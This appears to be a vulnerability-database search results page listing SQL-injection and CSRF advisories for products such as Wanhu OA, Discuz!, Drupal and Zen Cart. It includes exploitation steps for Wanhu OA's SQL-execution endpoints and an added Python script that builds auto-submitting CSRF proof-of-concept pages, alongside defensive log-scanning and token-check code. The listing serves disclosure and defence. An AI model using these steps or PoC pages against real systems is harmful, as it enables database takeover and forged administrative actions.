497 matches found
SweetRice 1.5.1 - Cross-Site Request Forgery Vulnerability
Exploit for PHP platform in category web applications. The PoC is an auto-submitting forged form (document.forms[0].submit()); 0day.today 2018-01-01...
CVE-2016-8582
A vulnerability exists in gauge.php of AlienVault OSSIM and USM before 5.3.2 that allows an attacker to execute an arbitrary SQL query and retrieve database information or read local system files via MySQL's LOAD_FILE()...
vBulletin forumrunner/includes/moderation.php SQL Injection Vulnerability
vBulletin is a powerful, flexible and fully customizable suite of forum programs. A SQL injection vulnerability exists in the forumrunner/includes/moderation.php file in versions of vBulletin prior to 4.2.2 Patch Level 5 and prior to 4.2.3 Patch Level 1. A remote attacker can exploit this...
miniMySQLAdmin 1.1.3 - Cross-Site Request Forgery (SQL Execution)
miniMySQLAdmin 1.1.3 - Cross-Site Request Forgery (SQL Execution). The PoC auto-submits a forged form with document.forms.csrfpoc.submit(); the injected query SELECT * FROM user ORDER BY User ASC LIMIT 20 returns Host/User rows such as % exploituser1 --...
Symphony CMS SQL Injection Vulnerability
Symphony is a content management system (CMS) developed in PHP on MySQL. Symphony suffers from a SQL injection vulnerability because the program fails to adequately validate the 'fields[username]', 'action[save]', and 'fields[email]' parameters, which can be exploited to execute arbitrary SQL code in the...
Multiple Vulnerabilities in the ERP System of Shenzhen Mingyuan Software Co.
Shenzhen Mingyuan Software Co., Ltd. is a real-estate application software and solution provider. Its ERP system contains multiple vulnerabilities; by chaining them, an attacker can obtain website control privileges a...
D-Link DAR-8000/DAR-7000 series Internet behaviour audit gateway: arbitrary SQL statement execution
No description provided by source...
CmsEasy_5.5_UTF-8_20140118 celive\include\database.class.php arbitrary SQL statement execution vulnerability
No description provided by source...
Wanhu OA (万户OA) arbitrary SQL statement execution vulnerability (Standard Edition)
There are two exploitation routes. 1. defaultroot/graphreport/runsql.jsp: this page can be opened directly and executes arbitrary SQL statements. The textarea on the page is readonly, but removing that attribute with Firebug is enough, after which arbitrary SQL statements can be executed. The statement can be seen to execute successfully. 2. Data can also be submitted directly to the handler class: open /defaultroot/GraphReportAction.do?action=showResult and POST the following data with HackBar to see the executed result: dataSQL=select...
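The two Wanhu OA endpoints named above are easy to spot in web-server access logs, which is where a defender first looks for this. The following is an added example, not part of the advisory or the product: a small scanner over combined-format access-log lines that flags any request to runsql.jsp or to GraphReportAction.do with action=showResult. The log lines are constructed for the example; note that the dataSQL POST body is not present in ordinary access logs, so the query text itself only shows up if request bodies are logged at a proxy or WAF.

```python
"""Added example (not from the listed advisory): flag requests to the two
Wanhu OA endpoints the entry names in Apache/nginx combined-format access
logs. SAMPLE_LOG is constructed for this example."""
import re
from urllib.parse import parse_qs, urlsplit

# Combined/common log format: ip ident user [timestamp] "METHOD target PROTO" status size
LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] '
    r'"(?P<method>[A-Z]+) (?P<target>\S+) \S+" '
    r'(?P<status>\d{3}) (?P<size>\S+)'
)

# Paths from the advisory; compared case-insensitively on the URL path only.
RUNSQL_PATH = "/defaultroot/graphreport/runsql.jsp"
ACTION_PATH = "/defaultroot/graphreportaction.do"


def classify(line):
    """Return a rule name when the request hits one of the watched endpoints,
    otherwise None (also None for lines that do not parse)."""
    m = LOG_RE.match(line)
    if not m:
        return None
    parts = urlsplit(m.group("target"))
    path = parts.path.lower()
    query = parse_qs(parts.query)
    if path.endswith(RUNSQL_PATH):
        # Route 1: the readonly textarea is a client-side control only.
        return "runsql.jsp"
    if path.endswith(ACTION_PATH) and query.get("action") == ["showResult"]:
        # Route 2: the handler class; the dataSQL parameter travels in the
        # POST body, which this log format does not record.
        return "GraphReportAction.do?action=showResult"
    return None


def scan(lines):
    """Run classify() over every line and return the hits as dicts."""
    hits = []
    for line in lines:
        rule = classify(line)
        if rule is None:
            continue
        m = LOG_RE.match(line)
        hits.append({
            "ip": m.group("ip"),
            "ts": m.group("ts"),
            "method": m.group("method"),
            "target": m.group("target"),
            "rule": rule,
        })
    return hits


# Constructed sample: two attacker requests and two benign ones.
SAMPLE_LOG = [
    '10.0.0.5 - - [01/Mar/2015:10:00:01 +0800] "GET /defaultroot/graphreport/runsql.jsp HTTP/1.1" 200 5120',
    '10.0.0.9 - - [01/Mar/2015:10:00:04 +0800] "GET /defaultroot/index.jsp HTTP/1.1" 200 2048',
    '10.0.0.5 - - [01/Mar/2015:10:00:07 +0800] "POST /defaultroot/GraphReportAction.do?action=showResult HTTP/1.1" 200 871',
    '10.0.0.9 - - [01/Mar/2015:10:01:00 +0800] "GET /defaultroot/GraphReportAction.do?action=list HTTP/1.1" 200 300',
]

if __name__ == "__main__":
    for hit in scan(SAMPLE_LOG):
        print(f'{hit["ts"]} {hit["ip"]} {hit["method"]} {hit["target"]} -> {hit["rule"]}')
```

Any hit on runsql.jsp from a non-administrative source address deserves a look regardless of status code, since the page renders the query form to whoever can reach it; for the action=showResult hits, pull the body from proxy or WAF logs to recover the dataSQL value.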
Discuz! admincp.php CSRF leading to XSS
First, a CSRF: url: /admincp.php?action=members&operation=newsletter&username=%2A&uid=0&srchemail=&regdatebefore=&regdateafter=&postshigher=&postslower=&regip=&lastip=&lastvisitafter=&lastvisitbefore=&lastpostafter=&lastpostbefore=&birthyear=&birthmonth=&birthday=&lowercredits=&lowerextcredits1=&lowere...
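Three of the entries above (SweetRice, miniMySQLAdmin and Discuz!) are the same bug in two shapes: a state-changing POST that a hidden form can replay with document.forms[0].submit(), and a state-changing GET that a single <img> tag can trigger. The following is an added example, not code from any of those advisories or products, showing how such a PoC page is assembled and the two server-side checks that defeat it. The form action, field names and site origin are assumed for illustration.

```python
"""Added example (not from the listed advisories): build the two CSRF PoC
shapes seen in the SweetRice / miniMySQLAdmin / Discuz! entries, and the
server-side Origin + per-session token check that stops them.
Target URLs and field names are assumed."""
import html
import hmac
import secrets
from urllib.parse import urlencode, urlsplit


def build_post_poc(action_url, fields):
    """HTML page that POSTs `fields` to `action_url` and auto-submits with
    document.forms[0].submit(). Values are attribute-escaped so an SQL
    payload containing quotes survives the round trip intact."""
    inputs = "\n".join(
        f'    <input type="hidden" name="{html.escape(k, quote=True)}" '
        f'value="{html.escape(v, quote=True)}">'
        for k, v in fields.items()
    )
    return (
        "<html><body>\n"
        f'  <form method="POST" action="{html.escape(action_url, quote=True)}">\n'
        f"{inputs}\n"
        "  </form>\n"
        "  <script>document.forms[0].submit();</script>\n"
        "</body></html>\n"
    )


def build_get_poc(base_url, params):
    """A GET-based CSRF (the Discuz! admincp.php URL shape) needs no form:
    an <img> fetching the URL with the victim's cookies is enough."""
    url = base_url + "?" + urlencode(params)
    return f'<img src="{html.escape(url, quote=True)}" width="1" height="1">'


def issue_csrf_token(session):
    """Server side: mint an unguessable per-session token the page must echo."""
    token = secrets.token_urlsafe(32)
    session["csrf_token"] = token
    return token


def _same_origin(header_value, site_origin):
    # Compare scheme://host exactly; a prefix test would accept target.evil.example.
    parts = urlsplit(header_value)
    return f"{parts.scheme}://{parts.netloc}" == site_origin


def is_request_forged(session, headers, form, site_origin):
    """Return True when a state-changing request must be rejected: the
    Origin (or Referer) header is missing/foreign, or the submitted token
    does not match the session's. Both checks are required; a forged form
    can set arbitrary fields but cannot read the victim's token or spoof
    the browser-set Origin header."""
    origin = headers.get("Origin") or headers.get("Referer", "")
    if not _same_origin(origin, site_origin):
        return True
    expected = session.get("csrf_token")
    supplied = form.get("csrf_token", "")
    if not expected or not hmac.compare_digest(expected, supplied):
        return True
    return False


if __name__ == "__main__":
    print(build_post_poc("http://target/minimysqladmin/index.php",
                         {"sql": "SELECT * FROM user ORDER BY User ASC LIMIT 20"}))
    print(build_get_poc("http://forum/admincp.php",
                        {"action": "members", "operation": "newsletter", "username": "*"}))
```

The GET variant is why "username=%2A" style URLs are dangerous on their own: nothing in the request distinguishes an administrator clicking a link from an image tag on a page they happened to open while logged in. A SameSite cookie attribute reduces exposure, but the token check is what makes the request unforgeable.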
ManageEngine EventLog Analyzer < 10.6 build 10060 - SQL Execution
Exploit Title: ManageEngine EventLog Analyzer SQL query execution Product: ManageEngine EventLog Analyzer Vulnerable Versions: v10.6 build 10060 and previous versions Tested Version: v10.6 build 10060 Windows Advisory Publication: 14/09/2015 Vulnerability Type: authenticated SQL query execution...
[SECURITY] Fedora 19 Update: phpMyAdmin-4.2.12-1.fc19
phpMyAdmin is a tool written in PHP intended to handle the administration of MySQL over the World Wide Web. Most frequently used operations are supported by the user interface (managing databases, tables, fields, relations, indexes, users, permissions), while you still have the ability to directly...
Drupal 7.x < 7.32 SQLi
The remote web server is running a version of Drupal that is 7.x prior to 7.32. It is, therefore, potentially affected by a SQL injection vulnerability due to a flaw in the Drupal database abstraction API, which allows a remote attacker to use specially crafted requests that can result in arbitra...
drupal7 -- SQL injection
Drupal Security Team reports: Drupal 7 includes a database abstraction API to ensure that queries executed against the database are sanitized to prevent SQL injection attacks. A vulnerability in this API allows an attacker to send specially crafted requests resulting in arbitrary SQL execution...
PT-2014-6183 · BMC · BMC Track-It!
Name of the Vulnerable Software and Affected Versions: BMC Track-It! version 11.3.0.355 Description: The issue allows remote authenticated users to execute arbitrary SQL commands via crafted POST data, specifically targeting the TrackItWeb/Grid/GetData endpoint. Recommendations: For version...
UBUNTU-CVE-2014-5262
SQL injection vulnerability in the graph settings script graphsettings.php in Cacti 0.8.8b and earlier allows remote attackers to execute arbitrary SQL commands via unspecified vectors...
ArticleFR 11.06.2014 (data.php) - Privilege Escalation
Exploit for PHP platform in category web applications. Advisory Details: High-Tech Bridge Security Research Lab discovered a vulnerability in ArticleFR which can be exploited to execute arbitrary UPDATE SQL statements, alter information stored in the database and gain complete control over the web site...
Multi Manage DbVisualizer Add Db Admin
DbVisualizer offers command-line functionality to execute SQL against databases pre-configured in the GUI. The remote database can be accessed from the command line without the need to authenticate, which can be abused to create an administrator in the database with the proper database permissions. Note:...
zabbix server Multiple Vulnerabilities
Zabbix Server : Multiple remote vulnerabilities From: Nicob nicob nicob net Date: Sun, 13 Dec 2009 16:28:35 +0100 From Wikipedia : Zabbix is a network management system application ... designed to monitor and track the status of various network services, servers...
Zen Cart 1.3.8 - Remote SQL Execution Exploit
#!/usr/bin/python ------- Zen Cart 1.3.8 Remote SQL Execution http://www.zen-cart.com/ Zen Cart Ecommerce - putting the dream of server rooting within reach of anyone! A new version 1.3.8a is available on http://www.zen-cart.com/ BlackH : Notes: must have...